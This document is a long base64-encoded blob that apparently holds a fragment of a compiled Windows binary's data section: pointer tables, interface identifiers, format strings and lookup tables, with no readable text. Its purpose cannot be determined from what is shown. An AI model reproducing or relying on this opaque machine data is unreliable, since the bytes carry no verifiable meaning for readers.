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AAIAAhANjZcWxIIJVwSCCVcIQMAABkAAAABAP////8AAEwA2P9cWxoDEAAAAAYACEA2WxIA3P8aAwgAAAAEADZbEgDk/xEAAgArCSkACAABAAIAEAABAAEAAAAEAP//GgMQAAAABgA2CEBbEgglXBEEAgArCSlUGAABAAIAEAAEAAEAAABaAAIAAADIAAMAAAA2Af////94Af//twgAAAAAECcAABoDMAAAAAoANjY2NjYICFsSCCVcEgglXBIIJVwSCCVcEgglXCEDAAAZAAAAAQD/////AABMAMr/XFsaAxAAAAAKAEwAsv9ANlxbEgDY/7cIAAAAABAnAAAaA4gAAAAeADY2NjY2NjYICAhMAAj5TAAE+UwAAPlMAPz4QFsSCCVcEgglXBIIJVwSCCVcEgglXBIIJVwSCCVcIQMAABkAAAABAP////8AAEwArv9cWxoDEAAAAAoATACW/0A2XFsSANj/twgAAAAAECcAABoDiAAAAB4ANjY2NjY2NggICAhMAJP4TACP+EwAi/hMAIf4WxIIJVwSCCVcEgglXBIIJVwSCCVcEgglXBIIJVwhAwAAGQAAAAEA/////wAATACu/1xbGgMQAAAACgBMAJb/QDZcWxIA2P+3CAAAAAAQJwAAGgMgAAAACgAICAgICAg2WxIIJVwhAwAAGQAAAAEA/////wAATADa/1xbGgMQAAAACgBMAML/QDZcWxIA2P8AAAAAAAAAAAAAAEgAAAAAAAAwADIAAABEAEAARwUKBwEAAQAAAAAACgAIAAIACwAQABgAEyAYAEAAEAEgAEgAcAAoAAgAAEgAAAAAAQAQADDgAAAAADgAQABEAgoBAAAAAAAAAAAYAQAAUABwAAgACAAASAAAAAADADAAMEAAAAAALAAkAEcGCgcBAAEAAAAAAAgAAABUAEgACAAIAAsBEABcAFAhGAAIABMBIACqAnAAKAAIAABIAAAAAAwAMAAwQAAAAAAsACQARwYKBwEAAQAAAAAACAAAAFQASAAIAAgACwEQAIYFUCEYAAgAEyEgANgFcAAoAAgAAEgAAAAAEAAwADBAAAAAACwAJABHBgoHAQABAAAAAAAIAAAAVABIAAgACAALARAAPAZQIRgACAATQSAAZgZwACgACAAAADMuMTMuMAAAYAAAADVCUeMGS9ERqwQAwE/C3NIEAAAAB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QOpA6kDqQOpA38DyQLPAlUDiQN/A38DfwNWAxQDCwNiA2EDYAOpA6kDqQOpA6kDqQOpA6kDqQOpA6kDqQOpA6kDqQOpAxADqQOpA6kDqQOpA6kDqQOpA6kDqQOpA6kDqQOpA6kDqQOLAxADEgMKA7sCNQMgAyADIAMRAwoD4AKfAysDKwPdAisDagOpA/wCPgP8AjUDAgMXAwIDNQMXA8cCFwPHAnMDcwMkAx8DJAMfAxcDMAMlAy4DLAM1A3MD+gL6AvoC7wJ3A3cDcwP6AuAC+gLvAvoC+gKpA8wC8gKOA44DigOKA4oDigOaA+IC4gKaA6kDlQOpA6kDqQOpA6kDqQOpA6kDqQOpA6kDqQOpA6kDqQOpA6kDqQNEA6kDqQOpA6kDqQOpA6kDqQOpA6kDqQOpA6kDqQOpA6kDgQOpA6kDqQOAA6kDqQOpA6MDqQOpA6kDqQOpA6kDLQOpAyYDqQOpA6kDqQOpA6kDqQOpA6kDqQOpA6kDqQOpA6kDqQOnA6kDqQNGA6kDRQNJA6kDwQKpAwAAwC4KgAEAAADMLgqAAQAAANQuCoABAAAA4C4KgAEAAAACAgMFAwQFBJIBkwOUAJQBlAGUAZMCkwKTApMCkwOTBZgGmgGcAJwDmwCZBZkCoACgAqICpACkBKQGpQKpAqkCqQSpA6kDqQKpA6kFqQKpBKkEqQGpAq4ArgGwALACsgKyA7IDsgOzArMCswGzAbMCsQOxArQAtAK0Ap8AtgG3ArcHtwW3BbcKugCsAKwDuwC7ArwBvAGTBL4CvgCTAaECwQnLBMsFwwHDAcMAzgDEA8QCxATPAs8AxQDFAtEC0QDQB9AJnQCdAr8C0gHSAtID0gTUAtQA0wDTA9MC1QTVAMkAyQO4BLgCrQGtAa0AxwDHA8gAyALKAMoCygTKBJMGxgDGApMI1wXXA5MGkwfYAtgB2QDZA9YD1gGrA6oBqwGrAasDqwWqAaoBqwGrA6sFqwSqAasDqwOrA6sDqwOrA6sDqwPaAdoCqwOrBasCqwOrA6sEqwKrAqsCqwLbAdsCqwWrBd0F3QTeAt4A3AHcAM0AzAPMAZMM3wHfAK8ArwO5BbkD4ADgApMEpwKoAr0BvQG9AcIAwgLCA+EG4QiOAY8CjwGQAZADkQCVAJUBlQKXAZcAkwKeBJ4ClgGWAZYBpAGlAaYBpgGjAqMAq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